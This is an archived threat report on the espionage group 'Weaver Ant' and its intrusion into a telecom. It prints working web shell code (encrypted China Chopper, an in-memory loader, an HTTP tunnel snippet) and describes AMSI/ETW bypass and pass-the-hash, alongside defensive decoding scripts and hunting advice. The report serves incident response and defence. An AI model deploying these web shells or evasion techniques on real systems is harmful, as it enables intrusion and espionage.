{
	"id": "93c4dd6a-7d4d-4291-87cc-6b01e544e1cf",
	"created_at": "2026-04-06T00:10:28.255692Z",
	"updated_at": "2026-04-10T03:30:58.014374Z",
	"deleted_at": null,
	"sha1_hash": "0715c757741fd80fc79462a363e87eade6fadcd7",
	"title": "Weaver Ant, the Web Shell Whisperer: Tracking a Live China-nexus Operation",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 246288,
	"plain_text": "Weaver Ant, the Web Shell Whisperer: Tracking a Live China-nexus\r\nOperation\r\nBy Sygnia\r\nPublished: 2025-03-24 · Archived: 2026-04-05 16:04:25 UTC\r\nExecutive Summary\r\nSygnia responded to a stealthy and highly persistent China-nexus threat actor operation targeting a major\r\ntelecommunication company in Asia. \r\nBased on our analysis, we assess that the group behind this intrusion—tracked by Sygnia as Weaver Ant—aimed to\r\ngain and maintain continuous access to telecommunication providers and facilitate cyber espionage by collecting\r\nsensitive information. \r\nThis blog explores the threat actor’s modus operandi, highlighting their use of web shells and web shell tunneling as\r\nprimary tools for maintaining persistence and enabling lateral movement throughout their operations. \r\nThis incident highlights the importance of establishing resilient defense strategies to protect against sophisticated\r\nthreats – particularly those posed by state-sponsored groups. A holistic approach to mitigating these threats combines\r\ncontinuous monitoring with proactive response mechanisms – including periodic and systematic threat hunts –\r\nalongside stringent traffic controls and system hardening practices for both legacy and public-facing devices. By\r\nembracing such an approach, organizations can enhance their ability to detect, deter, and counteract the persistent\r\nthreat presented by state-sponsored groups. \r\nA comprehensive technical annex containing the threat actor tools and payloads can be found here.\r\nIntroduction\r\nDuring the final phase of a forensic investigation, multiple alerts were triggered by suspicious activity. Specifically, an\r\naccount previously used by the threat actor was disabled as part of remediation efforts but was subsequently re-enabled\r\nby a service account. 
Notably, the activity originated from a server that had not been\r\npreviously identified as compromised. \r\nFurther investigation uncovered a variant of the China Chopper web shell deployed on an internal server, which had been\r\ncompromised for several years. It appeared that the remediation of the first threat actor inadvertently disrupted the\r\noperations of a second, China-nexus threat group, tracked by Sygnia as Weaver Ant. \r\nThis discovery prompted a large-scale forensic investigation, including an extensive hunt for additional web shell variants.\r\nUtilizing YARA rules and other enrichment mechanisms, the team identified dozens of similar web shells. The investigation\r\nrevealed an entire campaign that relies exclusively on web shells for persistent access, enabling both remote code execution\r\nand lateral movement through an intricate tunneling process. \r\nThe Web Shells Dynamic Duo\r\nDuring the web shell hunt, numerous instances of web shells were discovered, prompting a thorough classification effort.\r\nThis analysis revealed that the threat actor primarily utilized two types of web shells in different variants: one was classified\r\nby Sygnia as an encrypted China Chopper, while the second had no publicly available references to any known web shells\r\nand was named by Sygnia the ‘INMemory’ web shell.  \r\nEncrypted China Chopper\r\nThe China Chopper web shell is a lightweight malicious tool that enables threat actors to gain remote access and control\r\nover compromised web servers. Originally developed by Chinese threat actors, it offers functionalities such as file\r\nmanagement, command execution, and data exfiltration. 
Its small size and stealthy nature make China Chopper ideal for\r\nmaintaining persistent access, facilitating further exploitation, and evading detection by traditional security measures.\r\nAdditionally, its versatility and ease of use have made it a popular choice for executing a wide range of malicious activities\r\non targeted systems.\r\nThe most common web shell utilized by this threat actor was a China Chopper variant that AES-encrypts the payload.\r\nDespite its simplicity, this web shell is highly effective at bypassing automated payload inspection at the Web Application\r\nFirewall (WAF) level: the WAF sees only a Base64 blob and cannot match signatures against the code inside it. The\r\nencryption is no obstacle to an investigator, however, because the key and IV are hardcoded in the web shell file itself;\r\nanyone holding the file can decrypt every request that was ever sent to it.\r\nDeployed primarily on externally facing servers, the encrypted China Chopper web shell was implemented for both\r\nASP.NET (an ASPX page written in JScript.NET) and PHP. The compromised servers served as entry points, enabling the\r\nthreat actor to infiltrate the victim’s network and establish persistent access.\r\nhttps://www.sygnia.co/threat-reports-and-advisories/weaver-ant-tracking-a-china-nexus-cyber-espionage-operation/\r\nPage 1 of 10\n\n\u003c%@ Page Language=\"Jscript\"%\u003e\u003c%\r\nfunction AES(text)\r\n{\r\n var key = \u003ccustom_key\u003e;\r\n var iv = \u003ccustom_iv\u003e;\r\n var buf = Convert.FromBase64String(text);\r\n var rm = new System.Security.Cryptography.RijndaelManaged();\r\n rm.Key = System.Text.Encoding.UTF8.GetBytes(key);\r\n rm.IV = System.Text.Encoding.UTF8.GetBytes(iv);\r\n rm.Mode = System.Security.Cryptography.CipherMode.CBC;\r\n rm.Padding = System.Security.Cryptography.PaddingMode.Zeros;\r\n return System.Text.Encoding.UTF8.GetString(rm.CreateDecryptor().TransformFinalBlock(buf, 0, buf.Length));\r\n}\r\neval(AES(Request.Item[\u003ccustom_param_name\u003e]), \"unsafe\");\r\n%\u003e\r\nFigure 1: ASPX version of the China Chopper with encryption web shell. 
The ‘\u003ccustom_param_name\u003e‘, ‘\u003ccustom_key\u003e‘,\r\nand ‘\u003ccustom_iv\u003e‘ strings are placeholders.\r\n\u003c?php\r\n$key = \u003ccustom_key\u003e;\r\n$iv = \u003ccustom_iv\u003e;\r\n@eval(mcrypt_decrypt(MCRYPT_RIJNDAEL_128, $key, base64_decode($_POST[\u003ccustom_param_name\u003e]), MCRYPT_MODE_CBC, $iv));\r\n?\u003e\r\nFigure 2: PHP version of the China Chopper with encryption web shell. The ‘\u003ccustom_param_name\u003e‘, ‘\u003ccustom_key\u003e‘,\r\nand ‘\u003ccustom_iv\u003e‘ strings are placeholders.\r\nBoth variants implement the same scheme: Rijndael with a 128-bit block (i.e., AES, the key length selecting the key size) in\r\nCBC mode, with key and IV taken verbatim from the source file and no padding removed on decryption (‘PaddingMode.Zeros’\r\non .NET; mcrypt never strips padding). The PHP variant depends on the ‘mcrypt’ extension, which was deprecated in PHP 7.1\r\nand removed from core in PHP 7.2, so it only runs on older installations; the leading ‘@’ suppresses any warning that would\r\notherwise leak into the HTTP response.\r\nTwo features of the encrypted web shell posed challenges during the forensic investigation: \r\nKeyword-based evasion: The threat actor strategically used specific keywords as parameter names in the payload\r\nfield, such as ‘password,’ ‘key,’ and ‘pass.’ This acted as a defense evasion technique, as many WAFs automatically\r\nredact or mask these values in logs. As a result, the actual payload content was obscured, making it difficult to\r\nmonitor or analyze the transferred data. \r\nPayload truncation: The size of the transmitted payload exceeded the character limit supported by the deployed WAF\r\nsolution, leading to truncation of the logged data. This limitation prevented a complete forensic reconstruction of the\r\npayload, further complicating the investigation. \r\nINMemory Web Shell\r\nThe second web shell observed in this intrusion enables in-memory execution of malicious modules. \r\nThis web shell functions by decoding a hardcoded GZipped Base64 string into a Portable Executable (PE) named ‘eval.dll’\r\nand executing it entirely in memory to evade detection. The in-memory execution flow consists of the following steps: \r\n1. Decoding the Base64-encoded string into a byte array. \r\n2. Creating a memory stream over those compressed bytes. \r\n3. Wrapping that stream in a GZIP stream for decompression. \r\n4. Writing the decompressed bytes to a new memory stream and converting them into a byte array. \r\n5. 
Loading the decoded and decompressed byte array using ‘Assembly.Load’, executing the malicious payload without\r\nwriting it to disk. \r\nTo further evade string-based detection, the web shell keeps the type and method names it needs as Base64-encoded strings\r\nand resolves them by reflection at run time: ‘cc’ decodes the strings, ‘a.GetType(k)’ looks up the class, and ‘GetMethod’\r\nfinds the method that is then called through ‘Invoke’. The two strings are: \r\n‘RVZBTC5IYW5kbGVy’ → Decoded to ‘EVAL.Handler’ (where ‘EVAL’ represents the relevant namespace, and\r\n‘Handler’ refers to the class). \r\n‘SW52b2tl’ → Decoded to ‘Invoke’, the specific method in the malicious payload. \r\n\u003cscript id=\"no-caching\" runat=\"server\"\u003e\r\nstring cc(string a){ return Encoding.UTF8.GetString(Convert.FromBase64String(a)); }\r\nbyte[] ee(string p){\r\n string k=cc(\"RVZBTC5IYW5kbGVy\");\r\n Assembly a=Application[k]==null?(Application[k] as Assembly):null;\r\n if (a==null){\r\n var b=Convert.FromBase64String(\u003cbase64_encoded_dll\u003e);\r\n using(var d=new MemoryStream()){\r\n using(var s=new MemoryStream(b)){\r\n using(var g=new GZipStream(s,CompressionMode.Decompress)){\r\n b=new byte[1024];int c=0;while((c=g.Read(b,0,b.Length))\u003e0){d.Write(b,0,c);}\r\n}\r\n }\r\n b=d.ToArray();\r\n }\r\n a=Assembly.Load(b);Application[k]=a;\r\n }\r\n return (byte[])(a.GetType(k).GetMethod(cc(\"SW52b2tl\")).Invoke(null,new object[]{Application,Request.Params\r\n}\r\nvoid Page_Load(object sender,EventArgs e){\r\n try{\r\n var ret=ee(\u003cdll_parameters\u003e);\r\n if(ret.Length==3\u0026\u0026Encoding.UTF8.GetString(ret)==\"404\"){\r\n Response.StatusCode=404;\r\n }else{\r\n Response.BinaryWrite(ret);\r\n }\r\n }catch(Exception ex){\r\n Response.Write(ex.ToString());\r\n }\r\n}\r\n\u003c/script\u003e\r\nFigure 3: ASPX version of the ‘INMemory’ web shell. 
The ‘\u003cbase64_encoded_dll\u003e’ refers to the Base64 version of the\r\n‘eval.dll’ file, while ‘\u003cdll_parameters\u003e’ refers to the payload for execution. Note that the cache lookup in ‘ee’ is\r\ninverted (‘Application[k]==null’ where ‘!=null’ was evidently intended), so ‘a’ is always null and the assembly is\r\ndecompressed and loaded again on every request; the shell still works, but each hit produces a fresh in-memory\r\nassembly load, which is itself a usable detection signal.\r\nExecution using ‘eval.dll’\r\nThe ‘INMemory’ web shell executed the code contained within a portable executable (PE) named ‘eval.dll’, which\r\nultimately runs the payload delivered via an HTTP request. This PE is hardcoded within the web shell as a GZipped Base64\r\nstring and is stored in the variable ‘b’ (represented as ‘\u003cbase64_encoded_dll\u003e’ in the snippet code above).  \r\nUpon execution, the web shell invokes a method called ‘Invoke’, passing in the application state, the web server’s request\r\ncollection (‘Request.Params’, which combines query string, form, cookie and server-variable entries, the last of which\r\nexpose the HTTP headers) and a hardcoded SHA256 hash. The method performs the following operations: \r\n1. SHA256 Hash Matching:\r\n1. The ‘Invoke’ method calculates the SHA256 hash of the name of each entry in the request collection. \r\n2. It then compares the calculated hash to the hardcoded SHA256 value.\r\n2. Payload Decoding \u0026 Execution:\r\n1. If a matching entry is found, its value undergoes two-stage decoding: \r\n1. First Stage: Base64 decoding into raw bytes.\r\n2. Second Stage: UTF-8 decoding of those bytes into JScript source text. \r\n2. Finally, the decoded content is executed using ‘JScriptEvaluate’, a function from the Microsoft.JScript library, allowing\r\nthe payload to run dynamically.\r\nIf no entry matches, the shell returns a 404, so a request that does not carry the trigger name looks like a missing page.\r\nStoring only the hash of the trigger name means that name never appears as a string in the DLL, so it cannot be found by\r\nsimple string inspection, although the space of plausible parameter names is small enough that a wordlist recovers it.\r\nEmploying SHA256-based trigger validation and multi-stage decoding enhances the web shell’s evasion capabilities,\r\nmaking forensic detection more challenging. The use of ‘JScriptEvaluate’ further complicates analysis, as it enables\r\nexecution of obfuscated, dynamically loaded code within the compromised environment. 
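The following Python is an added illustration by the editor, not Sygnia’s code and not the actor’s. It models the ‘Invoke’ logic described above from the defender’s side: it hashes each request parameter name the way ‘sha256_hash’ does, applies the Base64-then-UTF-8 decode to the matching value, and shows that a short wordlist (seeded with the ‘password’, ‘key’, ‘pass’ names the actor favoured elsewhere on this page) recovers the hidden trigger name from the hardcoded digest. The digest, the trigger name ‘pass’, the sample request and the wordlist are all constructed for the example.

```python
# Added example (editor's code, not Sygnia's or the actor's): a defender-side
# model of the eval.dll request handling described above.
import base64
import hashlib


def sha256_hex(value: str) -> str:
    # Same output as the sha256_hash helper in Figure 4: lowercase hex of the
    # SHA256 digest over the UTF-8 bytes of the string.
    return hashlib.sha256(value.encode('utf-8')).hexdigest()


# Hypothetical hardcoded digest. A real eval.dll embeds this value; here it is
# derived from the assumed trigger name 'pass' so the example is self-contained.
HARDCODED_HASH = sha256_hex('pass')

# Constructed captured request: parameter names (what the shell hands to
# Invoke via Request.Params) mapped to their values.
SAMPLE_PAYLOAD = 'var x = 1 + 1; Response.Write(x);'
SAMPLE_PARAMS = {
    'id': '42',
    'pass': base64.b64encode(SAMPLE_PAYLOAD.encode('utf-8')).decode('ascii'),
}

# Constructed wordlist; a real hunt would use a much larger list.
WORDLIST = ['password', 'key', 'pass', 'token', 'auth', 'session', 'data']


def find_trigger(params: dict, target_hash: str):
    # What Invoke does per request: hash every parameter name and stop at the
    # first whose digest equals the hardcoded value. None means no match,
    # which is the case in which the real shell answers with a 404.
    for name in params:
        if sha256_hex(name) == target_hash:
            return name
    return None


def extract_payload(params: dict, target_hash: str):
    # Two-stage decode from Figure 5: Base64 -> raw bytes -> UTF-8 text.
    name = find_trigger(params, target_hash)
    if name is None:
        return None
    return base64.b64decode(params[name]).decode('utf-8')


def recover_trigger_name(target_hash: str, wordlist):
    # Offline recovery: the DLL only stores the digest, but parameter names
    # are short and predictable, so a wordlist finds the preimage quickly.
    for candidate in wordlist:
        if sha256_hex(candidate) == target_hash:
            return candidate
    return None


if __name__ == '__main__':
    print('trigger name:', recover_trigger_name(HARDCODED_HASH, WORDLIST))
    print('payload     :', extract_payload(SAMPLE_PARAMS, HARDCODED_HASH))
```

Once the trigger name is known, every request to the page that carries that name can be pulled from full-body captures and decoded with ‘extract_payload’, which is the step the WAF masking and truncation described earlier were preventing.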
\r\nprivate static string sha256_hash(object value)\r\n{\r\n StringBuilder stringBuilder = new StringBuilder();\r\n SHA256 sha = SHA256.Create();\r\n byte[] array = sha.ComputeHash(Encoding.UTF8.GetBytes(Microsoft.JScript.Convert.ToString(value, true)));\r\n for (double num = (double)0; num \u003c (double)((Array)array).Length; num += (double)1)\r\n {\r\n StringBuilder stringBuilder2 = stringBuilder;\r\n byte b = array[checked((int)Microsoft.JScript.Convert.CheckIfDoubleIsInteger(num))];\r\n stringBuilder2.Append(b.ToString(\"x2\"));\r\n }\r\n return stringBuilder.ToString();\r\n}\r\nFigure 4: Function ‘sha256_hash’ from ‘eval.dll’. The ‘double’ loop counter and the calls into ‘Microsoft.JScript.Convert’ are\r\nartifacts of JScript.NET source compiled to MSIL and then decompiled as C#, consistent with the JScript evaluator used below.\r\ntext = Encoding.UTF8.GetString(System.Convert.FromBase64String(nameValueCollection[Microsoft.JScript.Convert.T\r\nEval.JScriptEvaluate(text, vsaEngine);\r\nFigure 5: decoding and execution of the payload from ‘eval.dll’.\r\nThe 'JScriptEvaluate' function from the Microsoft.JScript library evaluates the JScript source passed to it, in this case ‘text’,\r\nwhich contains the decoded content extracted from the HTTP request. This evaluation is performed using a designated\r\nscript engine, ‘vsaEngine’.\r\nThe VSA engine (Visual Studio for Applications, i.e., the ‘Microsoft.Vsa’ hosting interfaces, obtained in JScript.NET through\r\n‘VsaEngine.CreateEngine()’) is the script host that compiles JScript source to MSIL and runs it at run time. By leveraging\r\nthis mechanism, the web shell can execute obfuscated or remotely supplied payloads without writing them to disk; the\r\ncompiled code exists only as a dynamic assembly inside the worker process.\r\nOther Means of (Stealth) Monitoring\r\nDuring the extensive web shell hunt, it became apparent that Weaver Ant was still operating within the compromised\r\nnetwork. 
To successfully investigate an advanced persistent threat, it was necessary to implement stealth monitoring to avoid\r\ncompromising the ongoing investigation and to prevent the threat actor from altering or temporarily halting their operations\r\nto remain undetected.  \r\nThe monitoring was not performed on the compromised machines themselves, as deploying an agent there might alert the\r\nthreat actor. Instead, we combined port mirroring with an architecture that automated the decryption and de-encapsulation\r\nof the tunneled web shell traffic. This approach closed the visibility gaps caused by various components, such as the WAF\r\nlimitations described above. \r\nBy correlating live data across multiple log sources, including the raw and complete HTTP requests and responses, we\r\nwere able to identify numerous payloads deployed by the threat actor and uncover a large-scale operation with persistence\r\nmechanisms deployed on dozens of servers. \r\nThe threat actor deployed minimalist web shells on compromised machines, often consisting of just a single line of code,\r\nsuch as a modified version of China Chopper. The web shells served merely as conduits for executing more sophisticated\r\npayloads that achieved the actual objectives. We observed multiple types of payloads with distinct purposes, one of the\r\nmost notable being a recursive HTTP tunnel tool. \r\nRecursive HTTP Tunnel Tool\r\nThe recursive tunnel tool functioned as a ‘second stage’ web shell, enabling HTTP tunneling to access internal resources. It\r\noperated by forwarding requests to other web servers and existed in both ASPX and PHP versions, ensuring compatibility\r\nacross different server technologies. The tool decoded parameters (e.g., ‘p1’, ‘p2’, and ‘f’) to dynamically construct and\r\nissue cURL requests based on the execution flow. 
\r\nSteps in the tunneling mechanism included: \r\nDecrypting the encrypted payload that carries the recursive tunnel tool. \r\nDecoding parameters (‘p1’ and ‘p2’) from Base64. \r\nParsing the parameters to reconstruct the HTTP request to forward. \r\nDynamically building and issuing the request based on the provided inputs. \r\nReturning the upstream server's response after forwarding the request. \r\nThis adaptive tunneling mechanism allowed the threat actor to seamlessly navigate different web environments and maintain\r\noperational flexibility. \r\nfunction o($data) {\r\n return base64_encode($data);\r\n}\r\ntry{\r\n $p1 = base64_decode($_POST['p1']);\r\n $p2 = base64_decode($_POST['p2']);\r\n $f = $_POST['f'];\r\n...\r\n...\r\n...\r\n array_push($hi, 'Content-Type: application/x-www-form-urlencoded');\r\n curl_setopt($client, CURLOPT_HTTPHEADER, $hi);\r\n }\r\n if(strlen($c) \u003e 0){\r\n curl_setopt($client, CURLOPT_COOKIE, $c);\r\n }\r\n curl_setopt($client, CURLOPT_POSTFIELDS, $data);\r\n $resp = curl_exec($client);\r\nFigure 6: Code Snippet from the PHP variant of the Recursive HTTP Tunnel Payload.\r\nTunneling in Web Shell?\r\nWhile web shells are commonly used for persistence or code execution on a compromised host, they can also be utilized for\r\nlateral movement and command and control. In this blog, we will refer to this technique as Web Shell Tunneling.  \r\nWeb shell tunneling is a method that leverages multiple web shells as ‘proxy servers’ to redirect inbound HTTP traffic to\r\nanother web shell on a different host for payload execution. This enabled Weaver Ant to operate on servers within different\r\nnetwork segments, typically internal servers not directly connected to the internet, by leveraging existing publicly\r\naccessible servers as operational gateways.  
\r\nThe web shell tunneling method has been observed before, employed by various threat actors such as Elephant Beetle. The\r\nprimary advantage of web shell tunneling is that it facilitates lateral movement within a compromised environment without\r\nthe need to deploy additional tools on the compromised hosts.\r\nFigure 7: Web Shell Tunneling flow.\r\nAnother benefit of this technique is that communication occurs over HTTP/S traffic, which may appear legitimate since the\r\ncompromised server hosts a web service and inbound traffic is expected over these ports.  \r\nImplementing this method requires the ability to generate HTTP/S traffic from compromised hosts, either through existing\r\nweb shell functions or by executing a custom payload on the compromised system. Once this capability is achieved, web\r\nshells can function as proxy servers, redirecting encapsulated command traffic to different hosts. \r\nUncovering the Matryoshka\r\nThe traffic flowing through the web shell tunneling was encrypted. To support forensic investigation needs, we employed\r\nport mirroring to capture each packet received by one of the compromised web servers. This allowed us to replicate the\r\nentire traffic received by Weaver Ant’s web shells in decrypted form, enabling us to trace the actions of the threat actor's\r\npayloads. (Where the mirrored traffic is TLS-wrapped, this step additionally needs the server’s private key or a capture\r\npoint behind TLS termination; the web shell’s own encryption layer sits inside the HTTP body.) \r\nSince the payloads were symmetrically encrypted with a hardcoded key embedded within the web shell itself, Sygnia’s IR\r\nteam developed automation to decrypt any new payloads received by the web shell. \r\nThis enabled us to ‘peel’ each layer of encryption and obfuscation within the payload code upon receiving the full output,\r\nthereby recovering the actual command or binary intended for execution on the server side. Weaver Ant occasionally sent\r\nonly the ‘p1’ parameter and sometimes both ‘p1’ and ‘p2’, with ‘p2’ carrying a further payload destined for a different\r\nweb server, i.e., forwarded from one web shell to the next. 
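As an added example (Sygnia’s decryption automation is not public, and this is not it; the code is the editor’s), the Python below peels a nested tunnel request layer by layer to recover the hop chain and the innermost command. The page establishes only that ‘p1’ and ‘p2’ are Base64-decoded and that ‘p2’ carries the payload for the next web server; the exact layout assumed here (‘p1’ is the next-hop URL when ‘p2’ is present, and the final command when ‘p1’ is alone), the hostnames and the command are assumptions for illustration. The per-shell symmetric encryption layer is represented by a pluggable ‘decrypt’ callable that defaults to identity because the constructed sample is not encrypted.

```python
# Added example (editor's code, not Sygnia's tooling): unwrap a nested web
# shell tunnel request ('Matryoshka') to recover the hop chain and command.
import base64
from urllib.parse import parse_qs, urlencode


def b64(text: str) -> str:
    return base64.b64encode(text.encode('utf-8')).decode('ascii')


def unb64(text: str) -> str:
    return base64.b64decode(text).decode('utf-8')


def wrap(target: str, inner_body: str) -> str:
    # Build one tunnel layer in the shape the PHP tool expects: p1 and p2
    # Base64-encoded, f as a flag. Layout is an assumption for this example.
    return urlencode({'p1': b64(target), 'p2': b64(inner_body), 'f': '1'})


def peel(body: str, decrypt=lambda data: data, max_depth: int = 16):
    # Returns (hops, final_payload). decrypt undoes the per-shell symmetric
    # layer (identity here); with a real capture plug in the AES-CBC routine
    # keyed from the web shell source. max_depth guards against a malformed or
    # adversarial capture that nests forever.
    hops = []
    for _ in range(max_depth):
        params = parse_qs(decrypt(body), keep_blank_values=True)
        if 'p1' not in params:
            raise ValueError('not a tunnel request: p1 missing')
        p1 = unb64(params['p1'][0])
        if 'p2' not in params:
            return hops, p1          # innermost doll: p1 is the command itself
        hops.append(p1)              # p1 names the next web shell to forward to
        body = unb64(params['p2'][0])
    raise ValueError('nesting deeper than max_depth; refusing to continue')


# Constructed three-hop chain: internet-facing shell -> DMZ shell -> internal
# shell, which finally runs the command. Hostnames are placeholders.
FINAL_COMMAND = 'whoami /all'
HOP_DMZ = 'http://dmz-web.example.internal/app/x.php'
HOP_INTERNAL = 'http://intranet-web.example.internal/admin/y.aspx'
SAMPLE_BODY = wrap(
    HOP_DMZ,
    wrap(HOP_INTERNAL, urlencode({'p1': b64(FINAL_COMMAND)})),
)


if __name__ == '__main__':
    hops, command = peel(SAMPLE_BODY)
    for depth, hop in enumerate(hops, 1):
        print('layer', depth, '->', hop)
    print('final payload:', command)
```

Run against a full-body capture at the internet-facing shell, ‘peel’ yields the ordered list of internal hosts the actor reached through it, which is the inventory a hunt needs before eradication: removing only the outer shell leaves every inner one in place.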
\r\nThe threat actor’s method is analogous to a ‘Matryoshka’ doll, where each layer conceals another, more critical layer within\r\nit. In this scenario, the malicious payloads were encapsulated in multiple layers of encryption and obfuscation, with each\r\nlayer being ‘peeled back’ by the next-in-line web shell to reveal the subsequent payload for execution. This layering allowed\r\nthe threat actor to remain evasive, with the true malicious intent only becoming apparent once the final payload was\r\nunveiled, much like the smallest doll hidden inside a nesting set. \r\nAfter unwrapping all layers of the ‘Matryoshka’, it became evident that during this campaign, Weaver Ant deployed multiple\r\npayloads, each serving a distinct purpose. These payloads demonstrate the threat actor’s sophistication and stealth, enabling\r\nthem to achieve their objectives while evading detection and maintaining persistent access within the network. \r\nThe following sections describe some of these payloads: \r\nETW Patch \u0026 AMSI Bypass\r\nTo evade detection, Weaver Ant applied the same defense evasion steps each time they operated on a compromised host,\r\nloading the relevant modules directly into memory rather than dropping them to disk.  \r\nETW (Event Tracing for Windows) is the kernel-supported tracing mechanism that Windows components and security\r\nsensors use to emit and consume events. The threat actor patched the ETW event-writing routines in the processes they\r\ncontrolled, suppressing the telemetry that event-log consumers such as Sysmon rely on. This manipulation caused critical\r\nlogs to be suppressed or dismissed, enabling the attacker to remain undetected. \r\nAMSI (Antimalware Scan Interface) is a Microsoft interface through which applications and services hand script content to\r\nthe registered antimalware product for scanning. To bypass AMSI, the attacker overwrote the ‘AmsiScanBuffer’ function in\r\nthe copy of ‘amsi.dll’ loaded in process memory (not the file on disk). This modification rendered AMSI integrations with\r\nsecurity tools, such as EDR and antivirus software, ineffective, allowing malicious PowerShell commands to execute without\r\ninterference. Both patches exist only in the memory of the hosting process, typically the IIS worker ‘w3wp.exe’ running the\r\nweb shell, and disappear when that process recycles, which is consistent with the actor reapplying them on every operation. 
\r\nPowerShell without PowerShell\r\nWeaver Ant employed a technique that leveraged the Windows module ‘System.Management.Automation.dll’ to execute\r\nPowerShell commands without starting the PowerShell.exe process. ‘System.Management.Automation.dll’ is the core\r\nassembly that provides the PowerShell runtime; any .NET process can load it, create a runspace and invoke commands\r\nwithout the standalone PowerShell executable ever appearing in the process tree.  \r\nSince this module underpins PowerShell’s functionality, the threat actor could perform reconnaissance, lateral movement,\r\nand prepare data exfiltration without triggering monitoring tools that typically flag PowerShell.exe activity. By avoiding the\r\nstandard PowerShell process, the threat actor bypassed heuristic and behavioral detections keyed on PowerShell.exe as a\r\nchild of the web server process, which significantly reduced the likelihood of detection. Two controls survive this trick:\r\nimage-load telemetry (for example Sysmon Event ID 7) showing ‘System.Management.Automation.dll’ or its native image\r\nbeing loaded into a host such as ‘w3wp.exe’, and the PowerShell engine’s own script block logging (Event ID 4104) and\r\ntranscription, which are features of the hosted runtime rather than of PowerShell.exe. \r\nLateral Movement over SMB \r\nLeveraging the ‘PowerShell without PowerShell’ execution technique, Weaver Ant employed known PowerShell tools,\r\nsuch as ‘Invoke-SMBClient’ from the Invoke-TheHash toolkit, to conduct reconnaissance and facilitate lateral movement\r\nfrom compromised web servers and other servers within the network. ‘Invoke-SMBClient’ is a PowerShell function that\r\nspeaks SMB directly, allowing tasks like listing shares and uploading or downloading files; its sibling ‘Invoke-SMBExec’\r\nprovides remote command execution over the same protocol.\r\nThis enabled the threat actor to deploy web shells on additional web servers, thereby expanding persistence within the\r\ninternal network and creating new external access vectors. \r\n‘Invoke-SMBClient’ was executed using valid credentials, leveraging high-privileged local or domain accounts with\r\npasswords that had not been rotated for years. 
Instead of clear-text passwords, the threat actor used NTLM hashes to invoke\r\nthe tool (pass-the-hash), which is why rotation matters more than password complexity here: the hash of a password that\r\nhas not changed in years is as good as the password itself. \r\nAs part of the lateral movement flow, Weaver Ant retrieved web server access logs and configuration files (e.g.,\r\n‘web.config’, ‘applicationHost.config’) from remote IIS web servers. The objectives were to harvest clear-text credentials\r\nstored in configuration files (connection strings and similar settings), build an understanding of how each IIS server\r\noperates, and determine whether the server was serving external users. \r\nFigure 8: Web shell deployment chain.\r\nReconnaissance Activities\r\nAs part of its reconnaissance efforts, Weaver Ant executed various ‘Invoke-SharpView’ commands against multiple Domain\r\nControllers within the same Active Directory (AD) Forest. These commands included ‘Get-DomainUserEvent’,\r\n‘Get-DomainSubnet’, ‘Get-DomainUser’, ‘Get-NetSession’ and others. \r\nThe primary objective was to enumerate the compromised Active Directory environment to identify high-privilege accounts\r\nand critical servers and add them to their target bank. \r\nThe command outputs were typically saved as files under ‘ C:\\ProgramData ’, then compressed using the ‘Invoke-ZIP’\r\nPowerShell function before exfiltration.\r\nA PowerShell command with PID '1111' was executed from '\u003cCOMPUTERNAME\u003e(Microsoft Windows NT 10.0.14393.0)' usi\r\n...\r\n...\r\n...\r\n...\r\nfunction Invoke-ZIP{\\r\\nparam(\\r\\n [Parameter(Mandatory=$true)]\\r\\n [string] $Folders,\\r\\n [string] $\r\nFigure 9: Code Snippet from PowerShell transcript log of a compromised server showing reconnaissance activities.\r\nA Note on Attribution\r\nThe malicious activities detailed in this report represent a subset of those investigated in connection with a specific Weaver\r\nAnt campaign. Weaver Ant is a threat actor exhibiting characteristics typical of a China-nexus targeted threat group. 
These\r\ncharacteristics include but are not limited to: \r\nTarget selection: Focused on specific industries and geographic locations that align with China’s cyber strategy. \r\nClear definition of goals: Well-defined objectives guided their operations. \r\nDeployment of web shells: Notably, a wide reliance on China Chopper web shell variants. \r\nAttack times: Weaver Ant carried out malicious activities primarily within the UTC+8 time zone, on regular working\r\ndays, while avoiding weekends and holidays. \r\nUse of an Operational Relay Box (ORB) network: Weaver Ant utilized a non-provisioned ORB network (one built from\r\ncompromised third-party devices rather than from infrastructure the actor leases) to proxy traffic and conceal their\r\ninfrastructure. This network primarily consists of compromised Zyxel CPE routers (mostly the VMG3625-T20A model)\r\noperated by Southeast Asian telecommunication providers. By using the ORB network, the threat actor leveraged a\r\ncompromised device from one telecom to pivot and target a device in another telecom. \r\nMalicious DLL deployment: Leveraged various techniques to load trojanized DLLs to infect systems. \r\nBackdoor utilization: Employed a backdoor previously attributed to Chinese APT groups by Cybereason and\r\nTrendMicro (https://www.cybereason.com/blog/research/deadringer-exposing-chinese-threat-actors-targeting-major-telcos?#cluster-c).\r\nWeaver Ant demonstrated exceptional persistence, maintaining activity within the compromised network for over four years,\r\ndespite multiple eradication attempts. Throughout this period, Weaver Ant adapted their TTPs to the evolving network\r\nenvironment, employing innovative methods to regain access and sustain their foothold. \r\nThe modus operandi of China-nexus intrusion sets typically involves the sharing of tools, infrastructure, and occasionally\r\nmanpower, such as through shared contractors. This collaborative approach complicates Sygnia's efforts to attribute attacks\r\nto any previously identified group. 
Additionally, the visibility available within the network does not allow Sygnia to confidently rule out the possibility\r\nof a ‘false-flag’ operation orchestrated by a different APT group. \r\nPost Kill-Switch Monitoring\r\nFollowing the investigation and mapping of all identified Weaver Ant web shells, we conducted a coordinated eradication\r\neffort to remove them from compromised hosts. \r\nAs part of this effort, we implemented additional visibility enhancements to closely monitor the environment, operating\r\nunder the assumption that Weaver Ant is a highly capable and persistent APT. Given their focus on espionage, it was deemed\r\nhighly likely that they would attempt to resume operations. This assumption is critical when countering such threat actors. \r\nThe monitoring efforts proved effective: Weaver Ant was detected attempting to regain access to the victim’s network.\r\nSygnia has been closely tracking and investigating their renewed activity, and a follow-up blog post will be published,\r\nrevealing their ‘upgraded’ modus operandi and tools. Spoiler alert: they still have a strong preference for web shells. \r\nRecommendations for Hunting Weaver Ant\r\nEnsure IIS logging is enabled and ingested into the SIEM, and log the X-Forwarded-For (XFF) header so that the true\r\nclient address is recorded when requests arrive through a load balancer or reverse proxy.\r\nMonitor for any disruptions or stoppages in log ingestion.\r\nMonitor for web page creation (e.g., new ‘.aspx’ or ‘.php’ files under web roots) by web server processes (e.g., ‘w3wp.exe’,\r\n‘tomcat6.exe’). \r\nMonitor for command execution originating from web server processes (e.g., ‘w3wp.exe’, ‘tomcat6.exe’), including\r\nin-process loads of ‘System.Management.Automation.dll’, not only child processes. \r\nMonitor for incoming HTTP requests with unusually large payloads in the request’s body (in IIS W3C logs this requires 